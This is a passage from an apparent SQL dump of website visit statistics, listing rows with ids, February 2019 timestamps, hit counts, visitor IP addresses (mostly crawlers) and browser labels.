49.66.152','chrome'),(386972,1550384752,1,1,0,0,'54.36.149.64','other'),(386973,1550384921,1,1,0,0,'91.209.11.236','other'),(386974,1550385189,1,1,0,0,'54.36.148.105','other'),(386975,1550385207,1,1,0,0,'54.36.148.168','other'),(386976,1550385227,1,1,0,0,'54.36.148.234','other'),(386977,1550385329,2,2,0,0,'66.249.66.42','chrome'),(386978,1550385590,1,1,0,0,'54.36.148.164','other'),(386979,1550386104,1,1,0,0,'54.36.148.20','other'),(386980,1550386129,1,1,0,0,'78.111.186.81','chrome'),(386981,1550386743,1,1,0,0,'207.46.13.15','other'),(386982,1550386815,2,2,0,0,'91.209.11.236','other'),(386983,1550386906,1,1,0,0,'66.249.66.154','chrome'),(386984,1550387006,1,1,0,0,'54.36.149.61','other'),(386985,1550387118,1,1,0,0,'66.249.66.40','chrome'),(386986,1550387630,1,1,0,0,'54.36.148.27','other'),(386987,1550387681,1,1,0,0,'54.36.148.231','other'),(386988,1550387692,1,1,0,0,'54.36.149.64','other'),(386989,1550387776,1,1,0,0,'54.36.149.41','other'),(386990,1550387863,1,1,0,0,'54.36.148.198','other'),(386991,1550387865,1,1,0,0,'54.36.148.178','other'),(386992,1550387987,2,2,0,0,'5.9.88.113','other'),(386993,1550388037,1,1,0,0,'54.36.148.243','other'),(386994,1550388198,1,1,0,0,'8.29.198.26','other'),(386995,1550388495,1,1,0,0,'54.36.148.15','other'),(386996,1550388997,1,1,0,0,'54.36.148.227','other'),(386997,1550389286,1,1,0,0,'157.55.39.230','other'),(386998,1550389301,1,1,0,0,'54.36.148.60','other'),(386999,1550389355,1,1,0,0,'54.36.148.232','other'),(387000,1550389404,1,1,0,0,'5.58.6.71','firefox'),(387001,1550389642,1,1,0,0,'54.36.148.120','other'),(387002,1550389670,1,1,0,0,'54.36.148.88','other'),(387003,1550389756,1,1,0,0,'8.29.198.25','other'),(387004,1550389979,1,1,0,0,'46.211.24.212','chrome'),(387005,1550390210,1,1,0,0,'54.36.148.235','other'),(387006,1550390426,1,1,0,0,'180.76.15.26','other'),(387007,1550390450,1,1,0,0,'157.55.39.114','other'),(387008,1550390458,1,1,0,0,'66.249.66.222','chrome'),(387009,1550390599,1,1,0,0,'66.249.66.152','chrome'),(387010,1550390976,1,1,0,0,'54.36.148.192','other'),(387011,1550391142,1,1,0,0,'54.36.148.227','other'),(387012,1550391221,1,1,0,0,'54.36.149.39','other'),(387013,1550391400,1,1,0,0,'46.211.24.212','chrome'),(387014,1550391424,1,1,0,0,'54.36.148.70','other'),(387015,1550391852,1,1,0,0,'66.249.66.156','chrome'),(387016,1550391884,1,1,0,0,'46.229.168.139','other'),(387017,1550392387,1,1,0,0,'54.36.148.197','other'),(387018,1550392402,1,1,0,0,'207.46.13.124','other'),(387019,1550392946,1,1,0,0,'54.36.148.215','other'),(387020,1550392951,1,1,0,0,'54.36.149.70','other'),(387021,1550393019,1,1,0,0,'54.36.148.184','other'),(387022,1550393048,1,1,0,0,'207.46.13.187','other'),(387023,1550393189,1,1,0,0,'66.249.66.44','chrome'),(387024,1550393317,1,1,0,0,'54.36.148.211','other'),(387025,1550393557,1,1,0,0,'54.36.149.37','other'),(387026,1550393646,1,1,0,0,'54.36.149.15','other'),(387027,1550393986,1,1,0,0,'54.36.149.71','other'),(387028,1550394178,1,1,0,0,'54.36.148.97','other'),(387029,1550394212,1,1,0,0,'54.36.148.94','other'),(387030,1550394377,1,1,0,0,'46.229.168.145','other'),(387031,1550394632,1,1,0,0,'216.244.66.241','other'),(387033,1550394722,1,1,0,0,'54.36.149.45','other'),(387034,1550394778,1,1,0,0,'54.36.148.156','other'),(387035,1550395018,3,3,0,0,'66.249.66.154','chrome'),(387036,1550395445,1,1,0,0,'66.249.66.152','chrome'),(387037,1550395557,1,1,0,0,'54.36.149.1','other'),(387038,1550395591,1,1,0,0,'54.36.149.5','other'),(387039,1550395787,1,1,0,0,'54.36.148.51','other'),(387040,1550396007,1,1,0,0,'54.36.149.6','other'),(387041,1550396162,1,1,0,0,'46.229.168.129','other'),(387042,1550396442,1,1,0,0,'54.36.148.14','other'),(387043,1550396633,1,1,0,0,'66.249.66.156','chrome'),(387044,1550396711,1,1,0,0,'46.229.168.147','other'),(387045,1550396999,3,3,0,0,'216.244.66.241','other'),(387046,1550397023,1,1,0,0,'54.36.148.68','other'),(387047,1550397047,1,1,0,0,'54.36.148.96','other'),(387048,1550397153,1,1,0,0,'54.36.148.15','other'),(387049,1550397227,1,1,0,0,'66.249.66.154','chrome'),(387050,1550397322,1,1,0,0,'13.66.139.0','other'),(387051,1550397376,1,1,0,0,'54.36.149.16','other'),(387052,1550397562,1,1,0,0,'66.249.66.152','chrome'),(387053,1550397568,1,1,0,0,'46.229.168.140','other'),(387054,1550397661,1,1,0,0,'54.36.148.17','other'),(387055,1550397804,1,1,0,0,'54.36.148.65','other'),(387056,1550398286,1,1,0,0,'46.229.168.147','other'),(387057,1550398473,1,1,0,0,'54.36.148.167','other'),(387058,1550398989,1,1,0,0,'54.36.148.142','other'),(387059,1550399025,1,1,0,0,'8.29.198.26','other'),(387060,1550399385,1,1,0,0,'178.154.244.11','other'),(387061,1550399496,1,1,0,0,'66.249.66.218','chrome'),(387062,1550399525,1,1,0,0,'207.46.13.187','other'),(387063,1550399660,1,1,0,0,'54.36.148.27','other'),(387064,1550400135,1,1,0,0,'188.113.7.166','chrome'),(387065,1550400159,1,1,0,0,'216.244.66.241','other'),(387066,1550400596,1,1,0,0,'8.29.198.26','other'),(387067,1550400620,1,1,0,0,'54.36.148.240','other'),(387068,1550401262,1,1,0,0,'54.36.148.121','other'),(387069,1550401276,1,1,0,0,'46.229.168.145','other'),(387070,1550401380,2,2,0,0,'40.77.167.104','other'),(387071,1550401405,1,1,0,0,'66.249.66.152','chrome'),(387072,1550401467,1,1,0,0,'54.36.149.96','other'),(387073,1550401573,1,1,0,0,'54.36.148.77','other'),(387074,1550401701,1,1,0,0,'54.36.148.230','other'),(387075,1550401702,1,1,0,0,'54.36.149.103','other'),(387076,1550401768,1,1,0,0,'66.249.66.156','chrome'),(387077,1550401936,1,1,0,0,'46.229.168.150','other'),(387078,1550401989,1,1,0,0,'54.36.148.104','other'),(387079,1550402057,1,1,0,0,'66.249.66.218','chrome'),(387080,1550402105,1,1,0,0,'54.36.148.209','other'),(387081,1550402223,1,1,0,0,'95.163.255.95','other'),(387082,1550402969,1,1,0,0,'40.77.167.104','other'),(387083,1550403087,1,1,0,0,'207.46.13.143','other'),(387084,1550403454,1,1,0,0,'54.36.148.27','other'),(387085,1550404042,1,1,0,0,'66.249.66.154','chrome'),(387086,1550404135,1,1,0,0,'54.36.148.158','other'),(387087,1550404222,2,2,0,0,'216.244.66.241','other'),(387088,1550405661,1,1,0,0,'54.36.148.41','other'),(387089,1550406020,1,1,0,0,'54.36.148.111','other'),(387090,1550406108,1,1,0,0,'157.55.39.208','other'),(387091,1550406271,1,1,0,0,'66.249.66.154','chrome'),(387092,1550406644,1,1,0,0,'54.36.148.116','other'),(387093,1550406901,1,1,0,0,'40.77.167.205','other'),(387094,1550407012,1,1,0,0,'46.229.168.141','other'),(387095,1550407215,2,2,0,0,'40.77.167.220','other'),(387096,1550407318,1,1,0,0,'54.36.148.73','other'),(387097,1550407334,1,1,0,0,'46.229.168.152','other'),(387098,1550407359,1,1,0,0,'54.36.148.60','other'),(387099,1550407652,1,1,0,0,'54.36.149.87','other'),(387100,1550407777,1,1,0,0,'185.155.33.9','chrome'),(387101,1550407813,1,1,0,0,'178.154.171.27','other'),(387102,1550408118,2,2,0,0,'216.244.66.241','other'),(387103,1550408369,2,2,0,0,'66.249.66.154','chrome'),(387104,1550408925,1,1,0,0,'54.36.148.231','other'),(387105,1550409420,1,1,0,0,'95.163.255.165','other'),(387106,1550409586,1,0,1,0,'66.249.66.58',''),(387107,1550409727,1,1,0,0,'54.36.149.49','other'),(387108,1550409835,1,1,0,0,'54.36.148.74','other'),(387109,1550409868,1,1,0,0,'40.77.167.205','other'),(387110,1550409887,1,1,0,0,'8.29.198.27','other'),(387111,1550410445,1,1,0,0,'40.77.167.213','other'),(387112,1550410649,1,1,0,0,'91.196.178.42','chrome'),(387113,1550410712,1,1,0,0,'54.36.149.10','other'),(387114,1550410818,1,1,0,0,'54.36.148.95','other'),(387115,1550410861,1,1,0,0,'66.249.66.152','chrome'),(387116,1550410950,1,1,0,0,'66.249.66.156','chrome'),(387117,1550410995,1,1,0,0,'54.36.148.236','other'),(387118,1550411097,3,3,0,0,'216.244.66.241','other'),(387119,1550411224,1,1,0,0,'54.36.148.255','other'),(387120,1550411391,1,1,0,0,'54.36.148.97','other'),(387121,1550411435,1,1,0,0,'8.29.198.27','other'),(387122,1550411541,1,1,0,0,'46.229.168.150','other'),(387123,1550412159,1,1,0,0,'66.249.66.42','chrome'),(387124,1550412312,1,1,0,0,'54.36.149.54','other'),(387125,1550412317,1,1,0,0,'54.36.149.91','other'),(387126,1550412352,1,1,0,0,'66.249.66.218','chrome'),(387127,1550412374,1,1,0,0,'54.36.148.202','other'),(387128,1550412696,1,1,0,0,'66.249.66.156','chrome'),(387129,1550412729,1,1,0,0,'46.229.168.150','other'),(387130,1550412742,2,2,0,0,'66.249.66.154','chrome'),(387131,1550413300,1,1,0,0,'54.36.149.68','other'),(387132,1550413338,1,1,0,0,'54.36.148.70','other'),(387133,1550413753,1,1,0,0,'54.36.148.68','other'),(387134,1550413789,1,1,0,0,'54.36.149.56','other'),(387135,1550413816,1,1,0,0,'40.77.167.213','other'),(387136,1550414073,2,2,0,0,'66.249.66.154','chrome'),(387137,1550414143,1,1,0,0,'54.36.148.200','other'),(387138,1550414339,1,1,0,0,'66.249.66.152','chrome'),(387139,1550414405,1,1,0,0,'54.36.148.102','other'),(387140,1550414847,1,1,0,0,'207.46.13.174','other'),(387141,1550414858,1,1,0,0,'54.36.148.136','other'),(387142,1550414876,1,1,0,0,'46.229.168.145','other'),(387143,1550415000,1,1,0,0,'54.36.148.221','other'),(387144,1550415003,1,1,0,0,'66.249.66.218','chrome'),(387145,1550415202,1,1,0,0,'54.36.148.205','other'),(387146,1550415273,1,1,0,0,'207.46.13.143','other'),(387147,1550415709,1,1,0,0,'66.249.66.152','chrome'),(387148,1550415731,1,1,0,0,'66.249.66.42','chrome'),(387149,1550415822,1,1,0,0,'54.36.149.61','other'),(387150,1550415909,1,1,0,0,'54.36.148.75','other'),(387151,1550416158,3,3,0,0,'216.244.66.241','other'),(387152,1550416163,1,1,0,0,'54.36.148.223','other'),(387153,1550416595,1,1,0,0,'5.188.210.53','chrome'),(387154,1550416596,1,1,0,0,'54.36.149.100','other'),(387155,1550417134,2,2,0,0,'66.249.66.156','chrome'),(387156,1550417863,1,1,0,0,'207.46.13.29','other'),(387157,1550417882,1,1,0,0,'180.76.15.145','other'),(387158,1550418043,1,1,0,0,'66.249.66.156','chrome'),(387159,1550418068,1,1,0,0,'46.211.109.141','chrome'),(387160,1550418198,1,1,0,0,'54.36.148.223','other'),(387161,1550418385,1,1,0,0,'54.36.148.92','other'),(387162,1550418539,2,2,0,0,'216.244.66.241','other'),(387163,1550418813,1,1,0,0,'207.46.13.174','other'),(387164,1550418949,1,1,0,0,'54.36.148.59','other'),(387165,1550419288,1,1,0,0,'54.36.149.98','other'),(387166,1550419316,1,1,0,0,'54.36.148.116','other'),(387167,1550419510,1,1,0,0,'207.46.13.38','other'),(387168,1550420108,1,1,0,0,'54.36.148.41','other'),(387169,1550420546,1,1,0,0,'54.36.148.184','other'),(387170,1550420697,1,1,0,0,'207.46.13.38','other'),(387171,1550420734,1,1,0,0,'8.29.198.25','other'),(387172,1550420970,3,3,0,0,'40.77.167.132','other'),(387173,1550421057,1,1,0,0,'54.36.148.201','other'),(387174,1550421105,1,1,0,0,'207.46.13.174','other'),(387175,1550421551,1,1,0,0,'54.36.148.124','other'),(387176,1550421680,1,1,0,0,'54.36.148.221','other'),(387177,1550421779,1,1,0,0,'46.229.168.133','other'),(387178,1550422297,1,1,0,0,'8.29.198.26','other'),(387179,1550422562,1,1,0,0,'54.36.149.34','other'),(387180,1550422738,1,1,0,0,'173.252.127.29','other'),(387181,1550422827,1,1,0,0,'46.201.178.213','chrome'),(387182,1550422917,1,1,0,0,'66.249.66.44','chrome'),(387183,1550423291,1,1,0,0,'46.229.168.129','other'),(387184,1550423316,1,1,0,0,'54.36.148.92','other'),(387185,1550423345,1,1,0,0,'66.249.66.156','chrome'),(387186,1550423818,1,1,0,0,'54.36.148.231','other'),(387187,1550423843,1,1,0,0,'54.36.149.21','other'),(387188,1550423861,2,2,0,0,'216.244.66.241','other'),(387189,1550424007,1,1,0,0,'54.36.149.19','other'),(387190,1550424617,1,1,0,0,'66.249.66.40','chrome'),(387191,1550424783,1,1,0,0,'40.77.167.132','other'),(387192,1550424896,1,1,0,0,'54.36.149.94','other'),(387193,1550424968,1,1,0,0,'54.36.148.26','other'),(387194,1550425836,1,1,0,0,'46.229.168.153','other'),(387195,1550425967,1,1,0,0,'40.77.167.132','other'),(387196,1550425994,1,1,0,0,'54.36.148.181','other'),(387197,1550426206,1,1,0,0,'54.36.148.219','other'),(387198,1550426343,2,2,0,0,'40.77.167.105','other'),(387199,1550426527,1,1,0,0,'54.36.148.89','other'),(387200,1550427218,1,1,0,0,'54.36.148.157','other'),(387201,1550427336,1,1,0,0,'54.36.148.48','other'),(387202,1550427440,1,1,0,0,'46.229.168.138','other'),(387203,1550427633,1,1,0,0,'54.36.148.212','other'),(387204,1550427858,1,1,0,0,'54.36.148.16','other'),(387205,1550428517,1,1,0,0,'66.249.66.154','chrome'),(387206,1550428601,1,1,0,0,'46.229.168.139','other'),(387207,1550429268,1,1,0,0,'66.249.66.42','chrome'),(387208,1550429590,1,1,0,0,'54.36.148.37','other'),(387209,1550429631,1,1,0,0,'94.178.99.133','chrome'),(387210,1550429707,1,1,0,0,'40.77.167.132','other'),(387211,1550429789,1,1,0,0,'66.249.66.156','chrome'),(387212,1550429951,1,1,0,0,'54.36.148.133','other'),(387213,1550429981,1,1,0,0,'91.196.178.98','chrome'),(387214,1550429994,1,1,0,0,'66.249.66.154','chrome'),(387215,1550430326,1,1,0,0,'91.196.178.135','chrome'),(387216,1550430620,1,1,0,0,'54.36.148.110','other'),(387217,1550430802,1,1,0,0,'54.36.148.15','other'),(387218,1550430837,1,1,0,0,'193.19.252.250','chrome'),(387219,1550430949,1,1,0,0,'157.55.39.183','other'),(387220,1550431020,1,1,0,0,'54.36.148.225','other'),(387221,1550431037,1,1,0,0,'207.46.13.196','other'),(387222,1550431094,1,0,1,0,'51.77.52.160',''),(387223,1550431178,1,1,0,0,'46.229.168.129','other'),(387224,1550431547,2,2,0,0,'46.229.168.135','other'),(387225,1550431577,1,1,0,0,'8.29.198.26','other'),(387226,1550431597,1,1,0,0,'54.36.148.240','other'),(387227,1550431629,2,2,0,0,'54.36.148.214','other'),(387228,1550431711,1,1,0,0,'66.249.66.152','chrome'),(387229,1550432045,1,1,0,0,'66.249.66.156','chrome'),(387230,1550432126,1,1,0,0,'216.244.66.241','other'),(387231,1550432242,1,1,0,0,'54.36.148.154','other'),(387232,1550432530,1,1,0,0,'54.36.148.215','other'),(387233,1550432622,1,1,0,0,'54.36.148.187','other'),(387234,1550433131,1,1,0,0,'8.29.198.25','other'),(387235,1550433280,1,1,0,0,'40.77.167.56','other'),(387236,1550433282,2,2,0,0,'141.8.142.103','other'),(387237,1550433861,1,1,0,0,'46.229.168.133','other'),(387238,1550433894,1,1,0,0,'66.249.66.154','chrome'),(387239,1550435109,1,1,0,0,'66.249.66.152','chrome'),(387240,1550435115,1,1,0,0,'54.36.148.213','other'),(387241,1550435199,1,1,0,0,'46.229.168.138','other'),(387242,1550435287,1,1,0,0,'54.36.148.115','other'),(387243,1550435294,1,1,0,0,'54.36.149.76','other'),(387244,1550435343,1,1,0,0,'141.101.1.47','chrome'),(387245,1550435412,1,1,0,0,'46.229.168.133','other'),(387246,1550435646,1,1,0,0,'54.36.148.109','other'),(387247,1550435796,2,2,0,0,'66.249.66.156','chrome'),(387248,1550436154,1,1,0,0,'54.36.149.16','other'),(387249,1550436822,1,1,0,0,'54.36.148.46','other'),(387250,1550436995,1,1,0,0,'54.36.148.173','other'),(387251,1550437013,1,1,0,0,'54.36.148.115','other'),(387252,1550437361,1,1,0,0,'46.229.168.129','other'),(387253,1550437817,1,1,0,0,'40.77.167.132','other'),(387254,1550438377,1,1,0,0,'216.244.66.241','other'),(387255,1550438529,1,1,0,0,'157.55.39.183','other'),(387256,1550438587,1,1,0,0,'54.36.149.15','other'),(387257,1550438922,1,1,0,0,'54.36.149.52','other'),(387258,1550439010,1,1,0,0,'141.8.142.103','other'),(387259,1550439012,1,1,0,0,'95.108.213.4','other'),(387260,1550439378,1,1,0,0,'54.36.149.49','other'),(387261,1550439389,1,1,0,0,'66.249.66.42','chrome'),(387262,1550439390,1,1,0,0,'54.36.149.39','other'),(387263,1550439656,1,1,0,0,'54.36.149.66','other'),(387264,1550440023,1,1,0,0,'54.36.148.12','other'),(387265,1550440034,1,1,0,0,'157.55.39.167','other'),(387266,1550440532,4,4,0,0,'216.244.66.241','other'),(387267,1550440971,1,1,0,0,'54.36.149.25','other'),(387268,1550441389,1,1,0,0,'46.229.168.133','other'),(387269,1550441413,1,1,0,0,'66.249.66.152','chrome'),(387270,1550441485,1,1,0,0,'46.229.168.138','other'),(387271,1550441672,1,1,0,0,'54.36.148.53','other'),(387272,1550441965,1,1,0,0,'46.229.168.135','other'),(387273,1550442226,1,1,0,0,'54.36.149.57','other'),(387274,1550442411,1,1,0,0,'8.29.198.25','other'),(387275,1550442514,1,1,0,0,'54.36.148.190','other'),(387276,1550442581,1,1,0,0,'54.36.149.81','other'),(387277,1550442590,1,1,0,0,'54.36.148.216','other'),(387278,1550442786,1,1,0,0,'54.36.149.6','other'),(387279,1550443001,1,1,0,0,'54.36.148.227','other'),(387280,1550443157,1,1,0,0,'66.249.66.42','chrome'),(387281,1550443571,1,1,0,0,'216.244.66.241','other'),(387282,1550443860,1,1,0,0,'188.32.96.180','chrome'),(387283,1550443968,1,1,0,0,'8.29.198.27','other'),(387284,1550443987,1,1,0,0,'66.249.66.154','chrome'),(387285,1550444061,1,1,0,0,'54.36.148.67','other'),(387286,1550444080,1,1,0,0,'46.229.168.137','other'),(387287,1550444173,1,1,0,0,'91.209.11.236','other'),(387288,1550444324,1,1,0,0,'157.55.39.167','other'),(387289,1550444442,1,1,0,0,'109.105.49.30','chrome'),(387290,1550444483,1,1,0,0,'54.36.148.176','other'),(387291,1550444596,1,1,0,0,'46.229.168.148','other'),(387292,1550444761,1,1,0,0,'66.249.66.156','chrome'),(387293,1550444832,1,1,0,0,'54.36.148.73','other'),(387294,1550444849,1,1,0,0,'178.154.244.11','other'),(387295,1550444939,1,1,0,0,'207.46.13.229','other'),(387296,1550445152,1,1,0,0,'54.36.148.130','other'),(387297,1550445527,2,2,0,0,'216.244.66.241','other'),(387298,1550445697,1,1,0,0,'54.36.148.228','other'),(387299,1550445734,1,1,0,0,'54.36.148.216','other'),(387300,1550446168,1,1,0,0,'54.36.149.68','other'),(387301,1550446253,1,1,0,0,'66.249.66.154','chrome'),(387302,1550446476,1,1,0,0,'54.36.149.26','other'),(387303,1550446477,3,3,0,0,'216.244.66.241','other'),(387304,1550447132,1,1,0,0,'54.36.148.93','other'),(387305,1550447241,1,1,0,0,'54.36.148.220','other'),(387306,1550447303,1,1,0,0,'54.36.148.91','other'),(387307,1550448014,1,1,0,0,'54.36.148.228','other'),(387308,1550448352,1,1,0,0,'54.36.148.136','other'),(387309,1550448480,1,1,0,0,'46.229.168.152','other'),(387310,1550448584,1,1,0,0,'54.36.148.19','other'),(387311,1550448641,1,1,0,0,'54.36.148.40','other'),(387312,1550448648,1,1,0,0,'66.249.66.154','chrome'),(387313,1550448695,1,1,0,0,'46.229.168.138','other'),(387314,1550448726,1,1,0,0,'207.46.13.20','other'),(387315,1550448778,1,1,0,0,'207.46.13.229','other'),(387316,1550448835,1,1,0,0,'216.244.66.241','other'),(387317,1550449163,1,1,0,0,'54.36.148.101','other'),(387318,1550450185,1,1,0,0,'46.229.168.140','other'),(387319,1550450194,1,1,0,0,'54.36.148.243','other'),(387320,1550450196,1,1,0,0,'54.36.148.29','other'),(387321,1550451032,1,1,0,0,'54.36.148.212','other'),(387322,1550451049,1,1,0,0,'54.36.148.11','other'),(387323,1550451320,2,2,0,0,'216.244.66.241','other'),(387324,1550451535,1,1,0,0,'54.36.149.0','other'),(387325,1550451841,1,1,0,0,'54.36.148.75','other'),(387326,1550451893,2,2,0,0,'66.249.66.152','chrome'),(387327,1550452318,1,1,0,0,'40.77.167.154','other'),(387328,1550452447,1,1,0,0,'54.36.148.211','other'),(387329,1550452453,1,1,0,0,'54.36.148.40','other'),(387330,1550452762,1,1,0,0,'54.36.148.185','other'),(387331,1550452869,1,1,0,0,'54.36.149.34','other'),(387332,1550452911,1,1,0,0,'46.229.168.139','other'),(387333,1550452949,1,1,0,0,'66.249.66.156','chrome'),(387334,1550453257,1,1,0,0,'8.29.198.27','other'),(387335,1550453314,1,1,0,0,'157.55.39.167','other'),(387336,1550453545,1,1,0,0,'54.36.148.16','other'),(387337,1550453940,1,1,0,0,'54.36.149.95','other'),(387338,1550454064,1,1,0,0,'54.36.149.49','other'),(387339,1550454146,3,3,0,0,'216.244.66.241','other'),(387340,1550454357,1,1,0,0,'54.36.149.36','other'),(387341,1550454695,1,1,0,0,'54.36.148.148','other'),(387342,1550454703,1,1,0,0,'54.36.148.72','other'),(387343,1550454720,1,1,0,0,'40.77.167.154','other'),(387344,1550454732,1,1,0,0,'46.229.168.147','other'),(387345,1550454807,1,1,0,0,'8.29.198.27','other'),(387346,1550454849,1,1,0,0,'66.249.66.40','chrome'),(387347,1550455045,1,1,0,0,'66.249.66.152','chrome'),(387348,1550455323,1,1,0,0,'54.36.148.98','other'),(387349,1550456061,1,1,0,0,'66.249.66.44','chrome'),(387350,1550456280,1,1,0,0,'40.77.167.154','other'),(387351,1550456991,2,2,0,0,'34.218.59.48','chrome'),(387352,1550457051,2,2,0,0,'54.36.148.137','other'),(387353,1550457104,1,1,0,0,'54.36.148.53','other'),(387354,1550457146,1,1,0,0,'216.244.66.241','other'),(387355,1550457580,1,1,0,0,'180.76.15.163','other'),(387356,1550457938,1,1,0,0,'46.229.168.151','other'),(387357,1550458211,1,1,0,0,'54.36.148.103','other'),(387358,1550458422,1,1,0,0,'54.36.149.77','other'),(387359,1550458749,2,2,0,0,'157.55.39.167','other'),(387360,1550458812,1,1,0,0,'66.249.66.40','chrome'),(387361,1550458845,1,1,0,0,'54.36.149.0','other'),(387362,1550459119,1,1,0,0,'54.36.148.34','other'),(387363,1550459179,1,1,0,0,'66.249.66.44','chrome'),(387364,1550459463,3,3,0,0,'216.244.66.241','other'),(387365,1550459610,1,1,0,0,'54.36.149.59','other'),(387366,1550459761,1,1,0,0,'54.36.149.76','other'),(387367,1550460025,1,1,0,0,'46.166.190.137','other'),(387368,1550460065,1,1,0,0,'54.36.149.10','other'),(387369,1550460598,1,1,0,0,'54.36.148.186','other'),(387370,1550460909,1,1,0,0,'54.36.148.239','other'),(387371,1550461096,1,1,0,0,'66.249.66.44','chrome'),(387372,1550461364,1,1,0,0,'54.36.148.129','other'),(387373,1550461463,1,1,0,0,'46.229.168.130','other'),(387374,1550461819,1,1,0,0,'216.244.66.241','other'),(387375,1550461927,1,1,0,0,'40.77.167.30','other'),(387376,1550461945,1,1,0,0,'54.36.148.172','other'),(387377,1550462107,1,1,0,0,'54.36.148.219','other'),(387378,1550462288,1,1,0,0,'54.36.148.117','other'),(387379,1550462303,1,1,0,0,'54.36.148.213','other'),(387380,1550462315,1,1,0,0,'54.36.149.41','other'),(387381,1550462759,1,1,0,0,'46.118.157.179','chrome'),(387382,1550462952,1,1,0,0,'66.249.66.152','chrome'),(387383,1550463241,1,1,0,0,'66.249.66.156','chrome'),(387384,1550463508,1,1,0,0,'54.36.149.44','other'),(387385,1550463538,1,1,0,0,'54.36.149.20','other'),(387386,1550463851,1,1,0,0,'54.36.149.47','other'),(387387,1550463969,1,1,0,0,'54.36.149.78','other'),(387388,1550464094,1,1,0,0,'8.29.198.26','other'),(387389,1550464172,1,1,0,0,'46.229.168.148','other'),(387390,1550464880,1,1,0,0,'54.36.148.144','other'),(387391,1550464924,1,1,0,0,'54.36.149.34','other'),(387392,1550464926,1,1,0,0,'54.36.149.88','other'),(387393,1550465028,1,1,0,0,'40.77.167.30','other'),(387394,1550465255,1,1,0,0,'54.36.148.179','other'),(387395,1550465300,1,1,0,0,'54.36.148.116','other'),(387396,1550465548,1,1,0,0,'216.244.66.241','other'),(387397,1550465607,1,1,0,0,'54.36.148.131','other'),(387398,1550465657,1,1,0,0,'8.29.198.26','other'),(387399,1550465849,1,1,0,0,'54.36.148.127','other'),(387400,1550466000,1,1,0,0,'66.249.66.40','chrome'),(387401,1550466040,1,1,0,0,'54.36.149.22','other'),(387402,1550466176,1,1,0,0,'40.77.167.26','other'),(387403,1550466253,1,1,0,0,'66.249.66.154','chrome'),(387404,1550466562,1,1,0,0,'54.36.148.22','other'),(387405,1550466680,1,1,0,0,'54.36.148.184','other'),(387406,1550466866,1,1,0,0,'54.36.148.154','other'),(387407,1550467069,1,1,0,0,'54.36.148.178','other'),(387408,1550467204,1,1,0,0,'46.229.168.148','other'),(387409,1550467352,1,1,0,0,'54.36.148.41','other'),(387410,1550467599,1,1,0,0,'54.36.148.107','other'),(387411,1550467654,1,1,0,0,'54.36.148.19','other'),(387412,1550467683,1,1,0,0,'46.229.168.132','other'),(387413,1550467730,1,1,0,0,'66.249.66.152','chrome'),(387414,1550467858,1,1,0,0,'54.36.148.112','other'),(387415,1550468362,1,1,0,0,'54.36.149.67','other'),(387416,1550468390,1,1,0,0,'13.57.233.99','chrome'),(387417,1550468952,1,1,0,0,'66.249.66.152','chrome'),(387418,1550469274,1,1,0,0,'54.36.149.104','other'),(387419,1550469913,1,1,0,0,'54.36.149.17','other'),(387420,1550470244,1,1,0,0,'89.234.157.254','other'),(387421,1550470312,1,1,0,0,'54.36.148.136','other'),(387422,1550470381,1,1,0,0,'157.55.39.216','other'),(387423,1550470883,1,1,0,0,'37.79.35.211','chrome'),(387424,1550470947,1,1,0,0,'95.163.255.187','other'),(387425,1550470949,1,1,0,0,'95.163.255.153','other'),(387426,1550471180,1,1,0,0,'66.249.66.44','chrome'),(387427,1550471309,1,1,0,0,'157.55.39.11','other'),(387428,1550471720,1,1,0,0,'157.55.39.208','other'),(387429,1550471862,1,1,0,0,'54.36.149.52','other'),(387430,1550472071,1,1,0,0,'54.36.149.98','other'),(387431,1550472126,1,1,0,0,'54.36.149.36','other'),(387432,1550472131,1,1,0,0,'66.249.66.44','chrome'),(387433,1550472235,1,1,0,0,'54.36.149.85','other'),(387434,1550472328,1,1,0,0,'91.196.177.46','firefox'),(387435,1550472345,1,1,0,0,'46.229.168.130','other'),(387436,1550472460,1,1,0,0,'91.124.182.170','firefox'),(387437,1550472464,1,1,0,0,'54.36.148.118','other'),(387438,1550472812,1,1,0,0,'66.249.66.156','chrome'),(387439,1550472906,1,1,0,0,'54.36.148.121','other'),(387440,1550472943,1,1,0,0,'46.229.168.136','other'),(387441,1550473179,1,1,0,0,'216.244.66.241','other'),(387442,1550473452,2,2,0,0,'141.8.183.23','other'),(387443,1550473939,1,1,0,0,'54.36.148.236','other'),(387444,1550474017,1,1,0,0,'178.92.244.114','firefox'),(387445,1550474280,1,1,0,0,'54.36.148.210','other'),(387446,1550474639,1,1,0,0,'157.55.39.208','other'),(387447,1550474685,1,1,0,0,'54.36.149.86','other'),(387448,1550474696,1,1,0,0,'54.36.148.105','other'),(387449,1550474856,1,1,0,0,'54.36.148.101','other'),(387450,1550474913,2,2,0,0,'91.196.178.94','chrome'),(387451,1550474946,1,1,0,0,'8.29.198.26','other'),(387452,1550475130,1,1,0,0,'54.36.148.57','other'),(387453,1550475226,1,1,0,0,'91.196.178.54','chrome'),(387454,1550475289,1,1,0,0,'157.55.39.11','other'),(387455,1550475547,1,1,0,0,'157.55.39.208','other'),(387456,1550475660,1,1,0,0,'66.249.66.222','chrome'),(387457,1550475721,1,1,0,0,'54.36.149.3','other'),(387458,1550475725,3,3,0,0,'216.244.66.241','other'),(387459,1550475980,1,1,0,0,'157.55.39.67','other'),(387460,1550476083,1,1,0,0,'46.229.168.153','other'),(387461,1550476134,1,1,0,0,'54.36.149.68','other'),(387462,1550476269,1,1,0,0,'54.36.148.20','other'),(387463,1550476349,1,1,0,0,'54.36.148.185','other'),(387464,1550476507,1,1,0,0,'8.29.198.25','other'),(387465,1550476508,1,1,0,0,'66.249.66.42','chrome'),(387466,1550476516,1,1,0,0,'95.163.255.160','other'),(387467,1550476613,1,1,0,0,'54.36.148.149','other'),(387468,1550476932,1,1,0,0,'157.55.39.11','other'),(387469,1550477365,1,1,0,0,'40.77.167.88','other'),(387470,1550477474,1,1,0,0,'54.36.148.106','other'),(387471,1550477610,1,1,0,0,'54.36.148.148','other'),(387472,1550477733,1,1,0,0,'37.53.80.217','firefox'),(387473,1550477820,1,1,0,0,'3.91.2.189','other'),(387474,1550477909,1,1,0,0,'54.36.149.69','other'),(387475,1550478047,1,1,0,0,'54.36.148.140','other'),(387476,1550478066,2,2,0,0,'91.196.178.94','chrome'),(387477,1550478123,1,1,0,0,'54.36.148.66','other'),(387478,1550478144,1,1,0,0,'157.55.39.67','other'),(387479,1550478413,1,1,0,0,'51.255.65.46','other'),(387480,1550478452,1,1,0,0,'216.244.66.241','other'),(387481,1550478656,2,2,0,0,'94.178.171.235','chrome'),(387482,1550478701,1,1,0,0,'46.229.168.135','other'),(38748